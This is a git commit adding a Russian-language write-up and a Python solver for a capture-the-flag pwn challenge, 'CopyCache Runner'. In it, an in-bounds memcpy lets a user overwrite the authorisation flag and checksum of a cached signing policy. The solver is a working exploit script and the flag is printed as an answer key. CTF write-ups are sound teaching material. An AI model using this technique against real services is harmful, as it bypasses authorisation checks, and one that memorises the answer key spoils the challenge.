Init. Commit
This commit is contained in:
@@ -0,0 +1,45 @@
|
||||
<h1 align="center">CopyCache Runner</h1>
|
||||
|
||||
<p align="center">
|
||||
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
|
||||
<img src="https://img.shields.io/badge/difficulty-hard-critical" alt="hard"/>
|
||||
</p>
|
||||
|
||||
Раннер сборки прошивок загружает шаблон политики подписи в кеш и проверяет его перед запуском задания. На диске шаблон менять нельзя, но для запуска важна именно копия в памяти. В ELF `copycache-runner` ищем, какие поля открывают экспорт и кто может их перезаписать.
|
||||
|
||||
## Решение
|
||||
|
||||
Смотрим расположение полей кешированной политики.
|
||||
|
||||
| Смещение | Поле | Что нужно для запуска |
|
||||
|---:|---|---|
|
||||
| 0 | `name[16]` | На проверку не влияет |
|
||||
| 16 | `flags` | `0x4558504f` |
|
||||
| 20 | `job` | `0x26050613` |
|
||||
| 24 | `checksum` | `flags ^ job ^ 0xa5a5a5a5` |
|
||||
|
||||
После загрузки `job` уже правильный, а `flags` равен нулю. Поэтому прямой вызов `run sealed job` заканчивается `policy denied`.
|
||||
|
||||
В меню есть операция `AEAD_COPY`. Она принимает смещение и 32-битное слово, проверяет только попадание записи внутрь всей структуры, после чего выполняет:
|
||||
|
||||
```c
|
||||
memcpy((char *)&cache + off, &word, 4);
|
||||
```
|
||||
|
||||
Граница структуры соблюдается, но служебные поля внутри неё доступны для записи наравне с остальными данными. Для экспорта меняем разрешение и пересчитываем контрольную сумму.
|
||||
|
||||
```python
|
||||
flags = 0x4558504f
|
||||
job = 0x26050613
|
||||
checksum = flags ^ job ^ 0xa5a5a5a5
|
||||
```
|
||||
|
||||
Через `3) AEAD_COPY` пишем `flags` по смещению `16`, затем `checksum` по смещению `24`. Если хочется проверить себя, `2) show cached policy` показывает новые значения.
|
||||
|
||||
При выборе `4) run sealed job` сервис проверяет разрешение на экспорт, номер задания и контрольную сумму в кеше. Изменённая политика проходит проверки, и сервис выдаёт флаг. Файл шаблона на диске при этом остаётся прежним.
|
||||
|
||||
[Солвер](solve/solve.py).
|
||||
|
||||
## Флаг
|
||||
|
||||
`caplag{copy_cache_changed_policy_without_touching_disk}`
|
||||
@@ -0,0 +1,60 @@
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import os
|
||||
import socket
|
||||
import struct
|
||||
import subprocess
|
||||
import sys
|
||||
|
||||
class Tube:
|
||||
def __init__(self, sock=None, proc=None):
|
||||
self.sock = sock
|
||||
self.proc = proc
|
||||
def recv(self, n=4096):
|
||||
if self.sock:
|
||||
return self.sock.recv(n)
|
||||
return os.read(self.proc.stdout.fileno(), n)
|
||||
def send(self, data):
|
||||
if self.sock:
|
||||
self.sock.sendall(data)
|
||||
else:
|
||||
os.write(self.proc.stdin.fileno(), data)
|
||||
def sendline(self, data):
|
||||
self.send(data + b"\n")
|
||||
def recvuntil(self, marker):
|
||||
out = b""
|
||||
while marker not in out:
|
||||
chunk = self.recv(1)
|
||||
if not chunk:
|
||||
raise EOFError(out)
|
||||
out += chunk
|
||||
return out
|
||||
|
||||
def symbol_value(binary, name):
|
||||
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
|
||||
for line in out.splitlines():
|
||||
fields = line.split()
|
||||
if len(fields) >= 8 and fields[-1] == name:
|
||||
return int(fields[1], 16)
|
||||
raise RuntimeError(f"symbol not found: {name}")
|
||||
|
||||
def connect(args):
|
||||
if args.local:
|
||||
env = os.environ.copy()
|
||||
env["CTF_FLAG"] = args.flag
|
||||
proc = subprocess.Popen([args.binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
|
||||
return Tube(proc=proc)
|
||||
return Tube(sock=socket.create_connection((args.host, args.port), timeout=5))
|
||||
|
||||
def choose(io, value):
|
||||
io.recvuntil(b">")
|
||||
io.sendline(str(value).encode())
|
||||
|
||||
def write_word(io, off, word):
|
||||
choose(io,3); io.recvuntil(b"dst offset:"); io.sendline(str(off).encode()); io.recvuntil(b"word:"); io.sendline(hex(word).encode())
|
||||
def main():
|
||||
p=argparse.ArgumentParser(); p.add_argument("--host",default="127.0.0.1"); p.add_argument("--port",type=int,default=31349); p.add_argument("--local",action="store_true"); p.add_argument("--binary",default="../public/copycache-runner"); p.add_argument("--flag",default="caplag{copy_cache_changed_policy_without_touching_disk}"); args=p.parse_args()
|
||||
io=connect(args); flags=0x4558504f; job=0x26050613; checksum=flags^job^0xa5a5a5a5
|
||||
write_word(io,16,flags); write_word(io,24,checksum)
|
||||
choose(io,4); data=io.recvuntil(b"}"); print(data[data.rfind(b"caplag{"):].decode())
|
||||
if __name__=="__main__": sys.exit(main())
|
||||
Reference in New Issue
Block a user